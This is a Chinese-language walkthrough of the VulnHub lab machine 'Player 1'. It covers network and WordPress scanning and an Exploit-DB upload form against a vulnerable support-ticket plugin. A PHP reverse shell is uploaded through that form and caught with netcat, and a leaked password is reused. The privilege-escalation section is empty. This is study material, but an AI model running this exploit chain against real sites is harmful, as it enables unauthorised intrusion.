Vulnhub之Player 1靶机详细测试过程

Player 1

识别目标主机IP地址

kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:bf:bb:24      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.224  08:00:27:78:95:6d      1      60  PCS Systemtechnik GmbH     

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.224

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.224 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-20 23:51 EDT
Nmap scan report for bogon (192.168.56.224)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open  mysql   MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
|   Thread ID: 38
|   Capabilities flags: 63486
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, SupportsTransactions, ODBCClient, SupportsLoadDataLocal, Support41Auth, Speaks41ProtocolNew, LongColumnFlag, ConnectWithDatabase, InteractiveClient, FoundRows, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: _^;H;/v)eBYxrR%^.g=8
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:78:95:6D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds

NMAP扫描结果表明目标主机有2个开放端口:80(http)、3306(mysql)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ mysql -uroot -p -h 192.168.56.224
Enter password: 
ERROR 1698 (28000): Access denied for user 'root'@'192.168.56.146'
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ mysql -uroot -p -h 192.168.56.224
Enter password: 
ERROR 1698 (28000): Access denied for user 'root'@'192.168.56.146'

mysql不存在弱口令。

└─$ curl http://192.168.56.224/robots.txt                                                                           
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.224 Port 80</address>
</body></html>
                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ nikto -h http://192.168.56.224 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.224
+ Target Hostname:    192.168.56.224
+ Target Port:        80
+ Start Time:         2023-03-20 23:53:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2962, size: 59d6a8bf07689, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-03-20 23:54:58 (GMT-4) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 


目录扫描没有什么收获,但是仔细查看页面:

y default, Debian does not allow access through the web browser to any file apart of those located in /var/www, public_html directories (when enabled) and /usr/share (for web applications). If your site is using a web document root located elsewhere (such as in /srv) you may need to whitelist your document root directory in /etc/apache2/apache2.conf.

The default Debian document root is /var/www/html/g@web. You can make your own virtual hosts under /var/www/mini@web. This is different to previous releases which provides better security out of the box. 

有目录:g@web,访问该目录,可知为wordpress站点。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ wpscan --url http://192.168.56.224/g@web -e u,p                                          
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.224/g@web/ [192.168.56.224]
[+] Started: Tue Mar 21 00:17:00 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.224/g@web/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.224/g@web/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: http://192.168.56.224/g@web/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.224/g@web/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.224/g@web/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.224/g@web/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://192.168.56.224/g@web/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://192.168.56.224/g@web/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://192.168.56.224/g@web/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://192.168.56.224/g@web/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.224/g@web/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: http://192.168.56.224/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.224/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] wp-local
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.224/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Mar 21 00:17:10 2023
[+] Requests Done: 56
[+] Cached Requests: 7
[+] Data Sent: 14.631 KB
[+] Data Received: 565.397 KB
[+] Memory used: 247.859 MB
[+] Elapsed time: 00:00:09

这里wpscan的结果中的链接含有密码为 : hackNos@9012!!

http://192.168.56.224/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1

但是登录失败,但是前面扫描出一个有漏洞的插件:

https://www.exploit-db.com/exploits/41006
form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">

    <input type="hidden" name="action" value="wpsp_upload_attachment">

    Choose a file ending with .phtml:

    <input type="file" name="0">

    <input type="submit" value="Submit">

</form>
form>

在本地创建文件,并修改,修改url

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ cat test.html 
<form method="post" enctype="multipart/form-data" action="http://192.168.56.224/g@web/wp-admin/admin-ajax.php">

    <input type="hidden" name="action" value="wpsp_upload_attachment">

    Choose a file ending with .phtml:

    <input type="file" name="0">

    <input type="submit" value="Submit">

</form>

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ cp ~/Desktop/Toolsets/PHPShell/php-reverse-shell.php shell.php
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ vim shell.php 
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ mv shell.php shell.phtml

然后访问:http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

进入目录即可发现我们上传的shell.phtml

http://192.168.56.224/g@web/wp-content/uploads/wpsp/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Player]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.224] 33830
Linux hacknos 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
 21:38:27 up 48 min,  0 users,  load average: 0.01, 0.38, 1.50
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'

前面到的密码hackNos@9012!!,经过尝试为security用户的密码

提权


热门相关:帝少的专属:小甜心,太缠人   豪门闪婚:帝少的神秘冷妻   刺客之王   第一神算:纨绔大小姐   继母2